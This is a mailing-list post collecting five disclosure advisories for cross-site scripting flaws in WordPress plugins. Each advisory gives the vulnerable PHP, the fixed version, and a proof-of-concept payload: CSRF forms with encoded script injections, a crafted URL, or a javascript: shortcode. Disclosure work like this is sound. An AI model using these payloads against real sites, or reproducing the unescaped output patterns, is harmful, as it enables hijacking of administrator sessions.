Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Sat, 19 Nov 2016 11:50:40 +0100
From: Summer of Pwnage <lists@...urify.nl>
To: oss-security@...ts.openwall.com
Subject: Multiple XSS vulnerabilities affecting five WordPress Plugins

Please see attached advisories for more information. These issues were 
found during Summer of Pwnage (https://sumofpwn.nl), a Dutch community 
project. Its goal is to contribute to the security of popular, widely 
used OSS projects in a fun and educational way.







------------------------------------------------------------------------
Cross-Site Scripting in All In One WP Security & Firewall WordPress
Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the All In One WP
Security & Firewall Plugin. This issue allows an attacker to perform a
wide variety of actions, such as stealing Administrators' session
tokens, or performing arbitrary actions on their behalf. In order to
exploit this issue, the attacker has to lure/force a logged on WordPress
Administrator into opening a malicious website.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160731-0003

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
These issues were successfully tested on the All In One WP Security &
Firewall [2] WordPress Plugin version 4.1.4 - 4.1.9.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue has been addressed in All In One WP Security & Firewall [3]
version 4.2.0.

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
All In One WP Security & Firewall [2] is a comprehensive, user-friendly,
all in one security and firewall plugin for WordPress. A Cross-Site
Scripting vulnerability was found in the All In One WP Security &
Firewall Plugin. This issue allows an attacker to perform a wide variety
of actions, such as stealing Administrators' session tokens, or
performing arbitrary actions on their behalf.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
This issue exists in the file admin/wp-security-dashboard-menu.php and
is caused due to the lack of output encoding on the tab request
parameter.

<div class="inside">
	<?php
	//Fetch, prepare, sort, and filter our data...
	$locked_ip_list->prepare_items();
	//echo "put table of locked entries here";
	?>
	<form id="tables-filter" method="get"
		onSubmit="return confirm('Are you sure you want to perform this bulk
operation on the selected entries?');">
		<!-- For plugins, we also need to ensure that the form posts back to
our current page -->
		<input type="hidden" name="page" value="<?php echo
esc_attr($_REQUEST['page']); ?>"/>
		<?php
		if (isset($_REQUEST["tab"])) {
			echo '<input type="hidden" name="tab" value="' . $_REQUEST["tab"] .
'" />';
		}
		?>
		<!-- Now we can render the completed list table -->
		<?php $locked_ip_list->display(); ?>
	</form>
</div>

In order to exploit this issue, the attacker has to lure/force a logged
on WordPress Administrator into opening a malicious website.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
<html>
	<body>
		<form
action="http://<target>/wp-admin/admin.php?page=aiowpsec&tab=tab3"
method="POST">
			<input type="hidden" name="tab"
value="&quot;&gt;&lt;script&gt;alert&#40;1&#41;&lt;&#47;script&gt;" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/cross_site_scripting_in_all_in_one_wp_security___firewall_wordpress_plugin.html
[2] https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/
[3]
https://downloads.wordpress.org/plugin/all-in-one-wp-security-and-firewall.zip
------------------------------------------------------------------------
Cross-Site Scripting in Check Email WordPress Plugin
------------------------------------------------------------------------
Antonis Manaras, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Check Email
WordPress Plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing Administrators' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a logged on WordPress
Administrator into opening a malicious website.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160725-0009

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Check Email [2] WordPress Plugin
version 0.3.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
The issue is fixed in Check Email [3] version 0.5.

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
Check Email [2] allows you to test if your WordPress installation is
sending emails correctly by sending a test email to an address of your
choice. A Cross-Site Scripting vulnerability was found in the Check
Email WordPress Plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing Administrators' session tokens, or
performing arbitrary actions on their behalf.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
A Reflected Cross-Site Scripting vulnerability exists in the Check Email
WordPress plugin. This vulnerability allows an attacker to perform any
action with the privileges of the admin user. The affected code is not
protected with an anti-Cross-Site Request Forgery token. Consequently,
it can be exploited by luring the target user into clicking a specially
crafted link or visiting a malicious website (or advertisement).

The vulnerability exists in the file check-email/check-email.php:

132:	echo $_POST["checkemail_mime"];

140:	echo $_POST["checkemail_type"];

148:	echo $_POST["checkemail_from"];

156:	echo $_POST["checkemail_cc"];


The vulnerability can be exploited using specially crafted URL
parameters. In order to exploit this issue the target user must click a
specially crafted link or visit a malicious website (or advertisement).

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
<html>
	<body>
		<form action="http://172.16.52.198/wp-admin/tools.php?page=checkemail"
method="POST">
			<input type="hidden" name="checkemail&#95;to" value="" />
			<input type="hidden" name="checkemail&#95;headers" value="custom" />
			<input type="hidden" name="checkemail&#95;mime"
value="&quot;&gt;&lt;img&#32;src&#61;x&#32;onerror&#61;alert&#40;1&#41;&#32;&#47;&gt;"
/>
			<input type="hidden" name="checkemail&#95;type"
value="&quot;&gt;&lt;img&#32;src&#61;x&#32;onerror&#61;alert&#40;2&#41;&#32;&#47;&#37;3"
/>
			<input type="hidden" name="checkemail&#95;from"
value="&quot;&gt;&lt;img&#32;src&#61;x&#32;onerror&#61;alert&#40;3&#41;&#32;&#47;&gt;"
/>
			<input type="hidden" name="checkemail&#95;cc"
value="&quot;&gt;&lt;&#47;textarea&gt;&lt;script&gt;alert&#40;4&#41;&#59;&lt;&#47;script&gt;"
/>
			<input type="hidden" name="checkemail&#95;break" value="&#92;n" />
			<input type="hidden" name="checkemail&#95;go"
value="Send&#32;test&#32;email" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/cross_site_scripting_in_check_email_wordpress_plugin.html
[2] https://wordpress.org/plugins/check-email/
[3] https://downloads.wordpress.org/plugin/check-email.zip
------------------------------------------------------------------------
Cross-Site Scripting in Huge IT Portfolio Gallery WordPress Plugin
------------------------------------------------------------------------
Antonis Manaras, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Huge IT Portfolio
Gallery WordPress Plugin. This issue allows an attacker to perform a
wide variety of actions, such as stealing Administrators' session
tokens, or performing arbitrary actions on their behalf. In order to
exploit this issue, the attacker has to lure/force a logged on WordPress
Administrator into opening a malicious website.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0009

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Portfolio Gallery [2] version
2.0.77.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
The issue is fixed in Portfolio Gallery [3] version 2.1.11.

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
Portfolio Gallery [2] is a great plugin for adding specialized portfolio
gallery, video portfolio gallery of just a gallery with single images.A
Cross-Site Scripting vulnerability was found in the Huge IT Portfolio
WordPress Plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing Administrators' session tokens, or
performing arbitrary actions on their behalf.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
A Reflected Cross-Site Scripting vulnerability exists in the Huge IT
Portfolio Gallery WordPress plugin. This vulnerability allows an
attacker to perform any action with the privileges of the admin user.
The affected code is not protected with an anti-Cross-Site Request
Forgery token. Consequently, it can be exploited by luring the target
user into clicking a specially crafted link or visiting a malicious
website (or advertisement).

The vulnerability exists in the file
.portfolio-gallery/admin/portfolios_views.php (line 804):
<a
href="admin.php?page=portfolios_huge_it_portfolio&task=portfolio_video&id=<?php
echo $_GET['id']; ?>&TB_iframe=1"
        class="button button-primary add-video-slide thickbox" 
id="slideup3s" value="iframepop">

The vulnerability can be exploited using a specially crafted ajaxurl URL
parameter. In order to exploit this issue the target user must click a
specially crafted link or visit a malicious website (or advertisement).


------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
http://<target>/wp-admin/admin.php?page=portfolios_huge_it_portfolio&task=portfolio_video&id=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/cross_site_scripting_in_huge_it_portfolio_gallery_wordpress_plugin.html
[2] https://wordpress.org/plugins/portfolio-gallery/
[3] https://downloads.wordpress.org/plugin/portfolio-gallery.2.1.11.zip
------------------------------------------------------------------------
Persistent Cross-Site Scripting in Instagram Feed plugin via CSRF
------------------------------------------------------------------------
Sipke Mellema, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A persistent Cross-Site Scripting vulnerability was found in the
Instagram Feed plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing Administrators' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a logged on WordPress
Administrator into opening a URL provided by an attacker.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0014

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on the Instagram Feed [2] WordPress
Plugin version 1.4.6.2.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Instagram Feed [3] WordPress Plugin version
1.4.7.

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
Instagram Feed is a WordPress plugin to display beautifully clean,
customizable, and responsive feeds from multiple Instagram accounts. A
persistent Cross-Site Scripting vulnerability was found in the Instagram
Feed plugin. This issue allows an attacker to perform a wide variety of
actions, such as stealing Administrators' session tokens, or performing
arbitrary actions on their behalf. In order to exploit this issue, the
attacker has to lure/force a logged on WordPress Administrator into
opening a URL provided by an attacker.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The settings page of the Instagram Feed plugin does not perform CSRF
checks. It's possible to change all settings in the plugin by making an
authenticated administrator perform a request to change the settings
(CSRF). It's possible to change the Instagram access token and id to
show images of other users. It's also possible to inject malicious
JavaScript in the Customize section, to perform Persistent Cross-Site
Scripting. Any user visiting the Instagram Feed will be injected with
the attackers payload after the CSRF attack.

------------------------------------------------------------------------
Proof of Concept
------------------------------------------------------------------------
Have an authenticated admin visit a webpage with the following form:

<html>
  <body>
    <form action="http://<wordpress
site>/wp-admin/admin.php?page=sb-instagram-feed&tab=customize"
method="POST">
      <input type="hidden"
name="sb&#95;instagram&#95;settings&#95;hidden&#95;field" value="Y" />
      <input type="hidden"
name="sb&#95;instagram&#95;customize&#95;hidden&#95;field" value="Y" />
      <input type="hidden" name="sb&#95;instagram&#95;width" value="100"
/>
      <input type="hidden" name="sb&#95;instagram&#95;width&#95;unit"
value="&#37;" />
      <input type="hidden" name="sb&#95;instagram&#95;height"
value="100" />
      <input type="hidden" name="sb&#95;instagram&#95;height&#95;unit"
value="&#37;" />
      <input type="hidden" name="sb&#95;instagram&#95;background"
value="&#35;474747" />
      <input type="hidden" name="sb&#95;instagram&#95;sort" value="none"
/>
      <input type="hidden" name="sb&#95;instagram&#95;num" value="20" />
      <input type="hidden" name="sb&#95;instagram&#95;cols" value="4" />
      <input type="hidden" name="sb&#95;instagram&#95;image&#95;res"
value="auto" />
      <input type="hidden" name="sb&#95;instagram&#95;image&#95;padding"
value="5" />
      <input type="hidden"
name="sb&#95;instagram&#95;image&#95;padding&#95;unit" value="px" />
      <input type="hidden" name="sb&#95;instagram&#95;show&#95;header"
value="on" />
      <input type="hidden" name="sb&#95;instagram&#95;header&#95;color"
value="" />
      <input type="hidden" name="sb&#95;instagram&#95;show&#95;btn"
value="on" />
      <input type="hidden"
name="sb&#95;instagram&#95;btn&#95;background" value="" />
      <input type="hidden"
name="sb&#95;instagram&#95;btn&#95;text&#95;color" value="" />
      <input type="hidden" name="sb&#95;instagram&#95;btn&#95;text"
value="Load&#32;More&#46;&#46;&#46;" />
      <input type="hidden"
name="sb&#95;instagram&#95;show&#95;follow&#95;btn" value="on" />
      <input type="hidden"
name="sb&#95;instagram&#95;folow&#95;btn&#95;background" value="" />
      <input type="hidden"
name="sb&#95;instagram&#95;follow&#95;btn&#95;text&#95;color" value=""
/>
      <input type="hidden"
name="sb&#95;instagram&#95;follow&#95;btn&#95;text"
value="Follow&#32;on&#32;Instagram" />
      <input type="hidden" name="sb&#95;instagram&#95;exclude&#95;words"
value="" />
      <input type="hidden" name="sb&#95;instagram&#95;include&#95;words"
value="" />
      <input type="hidden" name="sb&#95;instagram&#95;hide&#95;photos"
value="" />
      <input type="hidden" name="sb&#95;instagram&#95;block&#95;users"
value="" />
      <input type="hidden" name="sb&#95;instagram&#95;custom&#95;css"
value="" />
      <input type="hidden" name="sb&#95;instagram&#95;custom&#95;js"
value="&#125;&#13;&#10;&#125;&#41;&#59;&lt;&#47;script&gt;&lt;script&gt;alert&#40;1&#41;&#59;&lt;&#47;script&gt;&#13;&#10;"
/>
      <input type="hidden" name="submit" value="Save&#32;Changes" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

The Custom JavaScript section will now be saved with the attacker's
JavaScript payload.[h3]References[/h3]
[1]
https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_instagram_feed_plugin_via_csrf.html
[2] https://wordpress.org/plugins/instagram-feed/
[3] https://downloads.wordpress.org/plugin/instagram-feed.1.4.7.zip
------------------------------------------------------------------------
Stored Cross-Site Scripting in WP Canvas - Shortcodes WordPress Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the WP Canvas -
Shortcodes WordPress Plugin. This issue allows an attacker to perform a
wide variety of actions, such as stealing Administrators' session
tokens, or performing arbitrary actions on their behalf. This issue can
be exploited by authenticated users with the Contributor or higher role.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0031

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on WP Canvas - Shortcodes [2]
WordPress Plugin version 1.92.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue has been addressed in WP Canvas - Shortcodes [3] WordPress
Plugin version 2.07.

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The WP Canvas - Shortcodes [2] WordPress Plugin provides a number of
shortcodes that can be used in a WordPress post or page. A Cross-Site
Scripting vulnerability was found in the WP Canvas - Shortcodes
WordPress Plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing Administrators' session tokens, or
performing arbitrary actions on their behalf. This issue can be
exploited by authenticated users with the Contributor or higher role.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
This issue exists due to the lack of validation on the url attributed of
the wc_button shortcode. A Contributor or higher can create a button
with a specially crafted Javascript payload. When a (logged) on user
clicks on this button, the payload will be executed. This bypasses the
unfiltered_html privilege of WordPress, which is normally only assigned
to Editors & Administrators.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
[wc_button type="primary" url="javascript:alert(1)" title="Visit Site"
target="self" position="float"]Sample Content[/wc_button]
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/stored_cross_site_scripting_in_wp_canvas___shortcodes_wordpress_plugin.html
[2] https://wordpress.org/plugins/wc-shortcodes/
[3] https://downloads.wordpress.org/plugin/wc-shortcodes.zip

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ